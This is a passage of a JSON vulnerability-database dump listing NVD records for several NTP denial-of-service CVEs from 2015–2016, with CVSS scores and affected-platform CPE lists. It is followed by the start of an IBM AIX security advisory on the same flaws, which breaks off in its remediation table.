"cpe:2.3:a:ntp:ntp:4.2.7:p189:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p31:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p26:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T12:10:50", "description": "The broadcast mode replay prevention functionality in ntpd in NTP before 4.2.8p9 allows remote attackers to cause a denial of service (reject broadcast mode packets) via a crafted broadcast mode packet.", "edition": 3, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "LOW", "integrityImpact": "NONE", "baseScore": 4.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 1.4}, "published": "2017-01-13T16:59:00", "title": "CVE-2016-7427", "type": "cve", "cwe": ["CWE-400"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 3.3, "vectorString": "AV:A/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7427"], "modified": "2019-01-24T11:29:00", "cpe": ["cpe:/a:ntp:ntp:4.2.8"], "id": "CVE-2016-7427", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7427", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:ntp:ntp:4.2.8:p8:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p7:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p6:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:07:42", "description": "NTP before 4.2.8p9 does not properly perform the initial sync calculations, which allows remote attackers to unspecified impact via unknown vectors, related to a \"root distance that did not include the peer dispersion.\"", "edition": 5, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "NONE", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 1.4}, "published": "2017-01-13T16:59:00", "title": "CVE-2016-7433", "type": "cve", "cwe": ["CWE-682"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7433"], "modified": "2018-01-05T02:31:00", "cpe": ["cpe:/a:ntp:ntp:4.2.8"], "id": "CVE-2016-7433", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7433", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:ntp:ntp:4.2.8:p8:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:07:42", "description": "NTP before 4.2.8p9 changes the peer structure to the interface it receives the response from a source, which allows remote attackers to cause a denial of service (prevent communication with a source) by sending a response for a source to an interface the source does not use.", "edition": 5, "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "NONE", "baseScore": 3.7, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 1.4}, "published": "2017-01-13T16:59:00", "title": "CVE-2016-7429", "type": "cve", "cwe": ["CWE-18"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7429"], "modified": "2018-01-05T02:31:00", "cpe": ["cpe:/a:ntp:ntp:4.2.8"], "id": "CVE-2016-7429", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7429", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:ntp:ntp:4.2.8:p8:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:07:42", "description": "NTP before 4.2.8p9 rate limits responses received from the configured sources when rate limiting for all associations is enabled, which allows remote attackers to cause a denial of service (prevent responses from the sources) by sending responses with a spoofed source address.", "edition": 8, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2017-01-13T16:59:00", "title": "CVE-2016-7426", "type": "cve", "cwe": ["CWE-400"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7426"], "modified": "2020-06-18T18:14:00", "cpe": ["cpe:/o:redhat:enterprise_linux_server_tus:7.6", "cpe:/o:redhat:enterprise_linux_server_eus:7.4", "cpe:/o:redhat:enterprise_linux_server_aus:7.3", "cpe:/o:redhat:enterprise_linux_desktop:6.0", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:redhat:enterprise_linux_server_eus:7.3", "cpe:/o:redhat:enterprise_linux_server_eus:7.7", "cpe:/a:ntp:ntp:4.2.8", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.5", "cpe:/o:redhat:enterprise_linux_server_aus:7.4", "cpe:/o:redhat:enterprise_linux_server_aus:7.6", "cpe:/o:redhat:enterprise_linux_server_tus:7.7", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/o:redhat:enterprise_linux_server_tus:7.3", "cpe:/o:redhat:enterprise_linux_server_aus:7.7", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:redhat:enterprise_linux_workstation:6.0", "cpe:/o:redhat:enterprise_linux_server:6.0", "cpe:/a:ntp:ntp:4.2.5", "cpe:/o:redhat:enterprise_linux_server_eus:7.6"], "id": "CVE-2016-7426", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7426", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_server_aus:7.6:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p238_rc1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p242_rc1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p8:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p4:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p228:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p243_rc1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p210:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p211:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p3:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p223:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p220:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p241_rc1:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:esm:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-rc1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta3:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p208:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p234_rc1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p245_rc1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p250_rc1:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.3:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p216:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p246_rc1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p203:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p3-rc2:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p226:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.4:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta5:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p247_rc1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p221:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p3-rc3:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p219:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p2-rc2:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p2-rc3:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p244_rc1:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-rc2:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p230:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p214:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p5:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta4:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p224:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p3-rc1:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.7:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p249_rc1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p227:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p204:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.6:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p222:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p239_rc1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p7:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p212:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p218:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:-:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p209:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p215:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.7:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p232_rc1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p206:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p236_rc1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p237_rc1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p2:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p213:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.3:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta2:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.3:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.7:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p233_rc1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p2-rc1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p240_rc1:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.5:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.4:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p229:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p217:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p225:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p6:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p207:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p235_rc1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p248_rc1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p231_rc1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p205:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:07:44", "description": "ntpd in NTP before 4.2.8p9, when the trap service is enabled, allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via a crafted packet.", "edition": 5, "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 5.9, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-01-13T16:59:00", "title": "CVE-2016-9311", "type": "cve", "cwe": ["CWE-476"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.1, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9311"], "modified": "2019-01-24T11:29:00", "cpe": ["cpe:/a:ntp:ntp:4.2.8"], "id": "CVE-2016-9311", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-9311", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:a:ntp:ntp:4.2.8:p8:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:07:44", "description": "The control mode (mode 6) functionality in ntpd in NTP before 4.2.8p9 allows remote attackers to set or unset traps via a crafted control mode packet.", "edition": 5, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 2.5}, "published": "2017-01-13T16:59:00", "title": "CVE-2016-9310", "type": "cve", "cwe": ["CWE-400"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9310"], "modified": "2019-01-24T11:29:00", "cpe": ["cpe:/a:ntp:ntp:4.2.8"], "id": "CVE-2016-9310", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-9310", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}, "cpe23": ["cpe:2.3:a:ntp:ntp:4.2.8:p8:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:05", "description": "The ULOGTOD function in ntp.d in SNTP before 4.2.7p366 does not properly perform type conversions from a precision value to a double, which allows remote attackers to cause a denial of service (infinite loop) via a crafted NTP packet.", "edition": 5, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-07-21T14:29:00", "title": "CVE-2015-5219", "type": "cve", "cwe": ["CWE-704"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5219"], "modified": "2018-10-30T16:27:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:15.04", "cpe:/o:redhat:enterprise_linux_desktop:6.0", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:fedoraproject:fedora:21", "cpe:/o:suse:manager:2.1", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:suse:linux_enterprise_server:10", "cpe:/o:suse:manager_proxy:2.1", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:suse:openstack_cloud:5", "cpe:/a:suse:linux_enterprise_debuginfo:11", "cpe:/o:canonical:ubuntu_linux:15.10", "cpe:/o:novell:leap:42.2", "cpe:/o:opensuse:leap:42.1", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/a:ntp:ntp:4.2.7", "cpe:/o:redhat:enterprise_linux_hpc_node:7.0", "cpe:/o:redhat:enterprise_linux_hpc_node:6.0", "cpe:/o:debian:debian_linux:7.0", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:suse:linux_enterprise_server:11", "cpe:/o:redhat:enterprise_linux_workstation:6.0", "cpe:/o:fedoraproject:fedora:22", "cpe:/o:redhat:enterprise_linux_server:6.0", "cpe:/o:fedoraproject:fedora:23", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "CVE-2015-5219", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5219", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:fedoraproject:fedora:21:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:suse:linux_enterprise_debuginfo:11:sp3:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_hpc_node:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:15.04:*:*:*:*:*:*:*", "cpe:2.3:a:suse:linux_enterprise_debuginfo:11:sp2:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:suse:openstack_cloud:5:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:leap:42.2:*:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_server:11:sp3:*:*:ltss:*:*:*", "cpe:2.3:o:suse:manager_proxy:2.1:*:*:*:*:*:*:*", "cpe:2.3:o:suse:manager:2.1:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:23:*:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_server:10:sp4:*:*:ltss:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p355:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:15.10:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:22:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_hpc_node:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:leap:42.1:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*", "cpe:2.3:o:suse:linux_enterprise_server:11:sp2:*:*:ltss:*:*:*"]}], "aix": [{"lastseen": "2020-04-22T00:52:14", "bulletinFamily": "unix", "cvelist": ["CVE-2016-9311", "CVE-2016-7427", "CVE-2016-7428", "CVE-2016-9310"], "description": "IBM SECURITY ADVISORY\n\nFirst Issued: Mon Feb 13 15:32:47 CST 2017\n|Updated: Mon Oct 2 10:47:12 CDT 2017 \n|Update 2: Removed bos.net.tcp.ntp from the impacted fileset list for\n| AIX 7200-01-02. Fileset bos.net.tcp.ntpd is still listed as impacted\n| for AIX 7200-01-02.\n\n\nThe most recent version of this document is available here:\n\nhttp://aix.software.ibm.com/aix/efixes/security/ntp_advisory8.asc\nhttps://aix.software.ibm.com/aix/efixes/security/ntp_advisory8.asc\nftp://aix.software.ibm.com/aix/efixes/security/ntp_advisory8.asc\n\n\nSecurity Bulletin: Vulnerabilities in NTP affect AIX\n CVE-2016-7427 CVE-2016-7428 CVE-2016-9310 CVE-2016-9311 \n\n===============================================================================\n\nSUMMARY:\n\n There are multiple vulnerabilities in NTPv3 and NTPv4 that impact AIX. \n\n\n===============================================================================\n\nVULNERABILITY DETAILS:\n\n NTPv3 and NTPv4 are vulnerable to:\n\n CVEID: CVE-2016-7427\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7427 \n DESCRIPTION: NTP is vulnerable to a denial of service, caused by an error\n in broadcast mode replay prevention functionality. By sending specially \n crafted NTP packets, a local attacker could exploit this vulnerability to \n cause a denial of service.\n CVSS Base Score: 4\n CVSS Temporal Score: See\n https://exchange.xforce.ibmcloud.com/vulnerabilities/119088 for more\n information.\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n \n CVEID: CVE-2016-7428 \n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7428\n DESCRIPTION: NTP is vulnerable to a denial of service, caused by an error \n in broadcast mode poll interval enforcement functionality. By sending \n specially crafted NTP packets, a remote attacker from within the local \n network could exploit this vulnerability to cause a denial of service.\n CVSS Base Score: 4.3 \n CVSS Temporal Score: See\n https://exchange.xforce.ibmcloud.com/vulnerabilities/119089 for more\n information.\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n\n CVEID: CVE-2016-9310\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9310\n DESCRIPTION: NTP is vulnerable to a denial of service, caused by an error \n in the control mode (mode 6) functionality. By sending specially crafted \n control mode packets, a remote attacker could exploit this vulnerability \n to obtain sensitive information and cause the application to crash.\n CVSS Base Score: 6.5\n CVSS Temporal Score: See\n https://exchange.xforce.ibmcloud.com/vulnerabilities/119087 for more\n information.\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L)\n\n CVEID: CVE-2016-9311\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9311\n DESCRIPTION: NTP is vulnerable to a denial of service, caused by a NULL \n pointer dereference when trap service has been enabled. By sending specially \n crafted packets, a remote attacker could exploit this vulnerability to cause\n the application to crash. \n CVSS Base Score: 4.4\n CVSS Temporal Score: See\n https://exchange.xforce.ibmcloud.com/vulnerabilities/119086 for more\n information.\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H)\n\n \n AFFECTED PRODUCTS AND VERSIONS:\n \n AIX 5.3, 6.1, 7.1, 7.2\n VIOS 2.2\n\n The following fileset levels are vulnerable:\n \n key_fileset = aix\n \n For NTPv3:\n\n Fileset Lower Level Upper Level KEY PRODUCT(S)\n ------------------------------------------------------------------\n bos.net.tcp.client 5.3.12.0 5.3.12.10 key_w_fs NTPv3\n bos.net.tcp.client 6.1.9.0 6.1.9.200 key_w_fs NTPv3\n bos.net.tcp.client 7.1.3.0 7.1.3.48 key_w_fs NTPv3\n bos.net.tcp.client 7.1.4.0 7.1.4.30 key_w_fs NTPv3\n bos.net.tcp.ntp 7.2.0.0 7.2.0.2 key_w_fs NTPv3\n bos.net.tcp.ntpd 7.2.0.0 7.2.0.2 key_w_fs NTPv3\n bos.net.tcp.ntpd 7.2.1.0 7.2.1.0 key_w_fs NTPv3\n\n \n For NTPv4:\n\n Fileset Lower Level Upper Level KEY PRODUCT(S) \n -----------------------------------------------------------------\n ntp.rte 6.1.6.0 6.1.6.7 key_w_fs NTPv4\n ntp.rte 7.1.0.0 7.1.0.7 key_w_fs NTPv4 \n \n Note: To find out whether the affected filesets are installed \n on your systems, refer to the lslpp command found in AIX user's\n guide.\n\n Example: lslpp -L | grep -i ntp.rte \n\n\n REMEDIATION:\n\n A. APARS\n \n IBM has assigned the following APARs to this problem:\n\n For NTPv3:\n\n AIX Level APAR Availability SP KEY PRODUCT(S)\n ------------------------------------------------------------\n 5.3.12 IV92194 NA key_w_apar NTPv3\n 6.1.9 IV91803 ** SP9 key_w_apar NTPv3\n 7.1.3 IV92193 ** SP9 key_w_apar NTPv3\n 7.1.4 IV91951 ** SP4 key_w_apar 